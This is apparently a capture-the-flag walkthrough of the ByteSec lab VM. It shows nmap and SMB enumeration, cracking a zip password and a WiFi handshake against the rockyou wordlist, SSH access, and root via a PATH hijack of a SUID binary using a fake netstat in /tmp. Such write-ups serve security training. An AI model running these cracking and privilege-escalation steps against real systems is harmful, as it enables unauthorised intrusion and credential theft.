Byte Sec

Flag : 2 Flag first user And second root. Learning : exploit, SMB, Enumration, Stenography, Privilege Escalation. We recommend that you use VirtualBox and not VMware for this VM

URL: OS ByteSec

Difficulty: Intermediate

Author: Rahul Gehlaut


Set up the Machine with a host-only adapter and run a net discover command to find the associated IP. My interface eth1 is Host-Only on my main OS (Kali Linux).

netdiscover -i eth1


We can identify the machine with the IP, so we will scan it for open ports with nmap to a file named “nmap” with the following command:

nmap -sS -p- -A -o "nmap"


We have identified ports 80 139 445 2525 are open. Ports 138 and 2525 are worth noting as they could be smb. Read more about Samba shares here

To start, port 80 is open so we will investigate this port with a browser.

web page

At first glance, the bottom of the web page has the following text:


This is also seen in the page source:


This gives us a pretty obvious hint that there is probably samba running. Let’s perform some enumeration based on this information with the tool enum4linux. This tool is for enumerating information from Windows and Samba systems.



Known Usernames = administrator, guest, krbtgt, domain admins, root, bin, none.

Let’s try and log into SMB with smbclient. This tool launches an ftp-like client to access SMB/CIFS resources on servers - computerhope.

Execute the following command:

smbclient // -U smb -p

To break this command down, we are specifying the //host/smb with user -U smb and -p enables a printer service rather than as a normal filespace service.


We are logged in. There is a file named and main.txt which we will transfer to our local system with “get”.

get main.txt

There doesn’t seem to be anything on main.txt, let’s have a look at the archive:



The .zip file seems to be password protected. There is a tool we can use to try and crack the password by brute forcing.

fcrackzip is a zip file password cracker.

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u

To break down this command, -D specifies a dictionary attack, -p specifies the rockyou.txt dictionary and -u specifies the file we want to crack. The command will essentially try to decompress the zip archive using the passwords in the wordlist and return the password when successful.


A password has been found:

PASSWORD FOUND!!!!: pw == hacker1

Unzipping the file using the password gives us a .cap file. A .cap file is a packet capture file which can be analysed with traffic capture software such as Wireshark. To read more about this, Life Wire have a pretty good article on this. Let’s open up the file with Wireshark.

Looking at the .cap file, we see the protocol 802.11 being used. This Wireshark website explains the protocol that is seen on this traffic capture: Wireshark

After some research, we can identify WLAN as IEEE 802.11. These could be packets captured via WiFi. When analysing Wifi traffic, can often find a 3-way handshake whenever someone joins the network. We can try and crack this .cap file for any passwords.

Let’s use aircrack-ng, a tool which accesses WiFi network security. Run the following command:

aircrack-ng user.cap -w /usr/share/wordlists/rockyou.txt


Aircrack has found a password:

KEY FOUND! [ snowflake ]

There is a username that can easily be seen in the packet capture:



Now that we have a username and password, let’s try logging in with SSH. If you remember, a different port was open for ssh.

cat nmap | grep ssh

SSH on port 2525.

ssh [email protected] -p 2525

ssh login

Privilege Escalation

Let’s upgrade our shell with the following command:

python -c 'import pty;pty.spawn("/bin/bash")'


There are a few different home directories for users sagar, smb and blackjax:


This next section will be focusing on exploiting Set User ID (SUID). This is a good article about this if you want to read more:

Recipe for Root

And another website for some priv esc with a section on SUID:


The following command will identify any SUID enabled executables on the unix machine:

find / -user root -perm -4000 -print 2>/dev/null


For reference, these are a list of binaries native to Linux, meaning we should not investigate any of these:


One of the binaries identified from the command:


This is evidently not native so let’s have a closer look. Run the binary with the following command:



Let’s exploit this with the following commands:

cd /tmp
echo "/bin/bash" > netstat
chmod 777 netstat
export PATH=/tmp:$PATH

These commands essentially create a file called netstat in /tmp with correct permissions. The export command marks an environment variable to be exported to child-processes. Then the netscan binary is run again.


And we are root, with root flag:


Written on May 21, 2020